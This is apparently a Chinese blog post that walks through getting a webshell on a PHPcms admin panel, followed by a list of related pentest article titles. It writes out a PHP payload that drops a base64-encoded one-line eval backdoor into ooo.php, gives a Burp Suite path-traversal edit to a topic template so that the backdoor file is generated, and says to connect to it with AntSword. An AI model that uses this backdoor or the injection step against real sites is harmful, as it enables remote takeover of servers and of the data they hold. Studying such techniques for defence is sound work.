登录界面

后台网址

www.phpcms.com/admin.php

进入主页面

代码注入拿webshell

接下来 我直接就上图了

写入一句话木马

<?php file_put_contents('ooo.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2FhXSk7Pz4=')); ?>

查看专题

继续添加第二个专题

利用burpsuit拦截将代码写入,意思是将专题dayu2-扩展设置-专题首页里的index写入代码调用专题ooo1中的一句话生成一句话文件


抓包将index除替换:…/…/…/…/html/special/ooo1/index

查看专题 创建成功

利用蚁剑连接一句话 即可

PHPcms框架的Webshell相关推荐

  1. Aspcms框架的webshell

    文章目录 渗透测试-地基篇-Webshell-Aspcms框架(十) 一.登录演示 二.数据库备份拿webshell 一.登录演示 本次演示一种方法思路拿aspcms框架的webshell,该页面是用 ...

  2. 织梦dedecms的框架的Webshell

    一.后台 后台登录 http://www.dedecms.com/dede 后台界面 二.Webshell方法 1:文件上传 蚁剑进行连接 成功 2:新建一句话文件 蚁剑连接 3:html修改 打开模 ...

  3. PHP-CMS框架选择 Wordpress、Drupal、October、PHPCMS、Dedecms、帝国CMS

    背景:最近有个项目需要做个cms系统,无疑php的cms框架是最多的,国内国外都很多也比较成熟,可以大大节省自己开发的时间. 过程: 先是在网上了解了一下各个cms框架的优劣,然后结合自身实际情况,最 ...

  4. Sql注入工具php,phpcms框架SQL注入--基于Havij工具

    sql注入的步骤: 1.首先观察网站是通过GET还是POST方式传输数据的: a.如果是GET传输,则在url中输入?id=1' 或者 " 或者 ') 来测试是否存在sql注入. b.如果是 ...

  5. xyCMS框架的webshell

    "%><%eval request("d")%><%s=" 在网站配置页面插入一句话.(注意一定要把前后内容闭合,不然整个网站都要崩溃) ...

  6. Veil生成免杀payload 渗透win10 获取靶机shell

    一:实验环境 两台机器处于同网段 攻击机:kali 192.168.115.134 靶机:win10 192.168.115.1 二:Veil下载.安装.使用 kali里默认没有安装Veil,我们通过 ...

  7. Burp Collaborator 使用总结

    0x00:使用原因 我们在做渗透测试的时候,经常会遇到这种情况,测试跨站可能有些功能插入恶意脚本后无法立即触发,例如提交反馈表单,需要等管理员打开查看提交信息时才会触发,或者是盲注跨站,盲打 XSS ...

  8. BBScan:信息泄漏批量扫描脚本

    有些朋友手上有几十万甚至上百万个域名,如果把这些域名全部扔给wvs. APPscan这样的重型扫描器,显然是不太合适的. 对于一个拥有上万IP的企业,又如何快速定位可能存在弱点的机器呢? 试试信息泄漏 ...

  9. jexboss工具 -- JBOSS未授权访问漏洞利用

    其实所有的节日,都不是为了礼物和红包而生,而是提醒我们不要忘记爱与被爱,生活需要仪式感,而你需要的是在乎和关爱... ----  网易云热评 小受:Ubuntu20 小攻:Kali2020 一.搭建该 ...

最新文章

  1. 第三百九十二节,Django+Xadmin打造上线标准的在线教育平台—sql注入攻击,xss攻击,csrf攻击...
  2. maven 上传jar 包含源码
  3. 51nod 1785 数据流中的算法 (方差计算公式)
  4. mfc创建一个word操作工程 【转自:http://blog.csdn.net/tg2003/article/details/4399981】
  5. Web开发-Django视图层
  6. Java集合-ArrayList源码解析-JDK1.8
  7. 单元测试原来是这样的呼
  8. 指纹图像方向图matlab,matlab指纹方向场方向图程序
  9. Java Dictionary get()方法与示例
  10. 【转】Serverless架构
  11. 一位算法工程师从30+场秋招面试中总结出的超强面经——目标检测篇(含答案)...
  12. rails/ruby/gem/RubyOnRails环境搭建-Windows
  13. zabbix监控服务器raid状态,基于Zabbix的MegaRAID阵列卡状态监控
  14. 快速生成 .ftl 文件
  15. Atlas中间件实现Mysql读写分离
  16. 解决Chrome浏览器变慢
  17. webRTC音频NetEq之音频包插入缓冲抖动BUFF处理过程
  18. ECCV2018 | 论文阅读CornerNet: Detecting Objects as Paired Keypoints
  19. 高效人士的116个IT秘诀
  20. php相册排版,照片拼图在线制作 自带多种照片拼图模板,自由排版将多张照片合成一张...

热门文章

  1. NB-IoT在智能锁领域的应用
  2. 无线网状网、Zigbee、RFID三种技术分析
  3. php缓存实例,一个PHP缓存类实例
  4. Android布局怎么画图形,Android开发者的图形化布局
  5. java怎么截取后8位数字_java如何更快生成00000000~99999999的8位数字保存到文件中?...
  6. linux系统如何打开python_手把手教你在Linux系统下使用Python虚拟环境
  7. 结尾的单词_22个以“ez”结尾的西语单词,你掌握了吗?
  8. webservice 参数太大_手把手系列:常用数据交换方案Web Service接口处理法
  9. c语言循环与数组训练题,C语言循环数组练习题解读.doc
  10. android的padding属性,以编程方式获取android:padding属性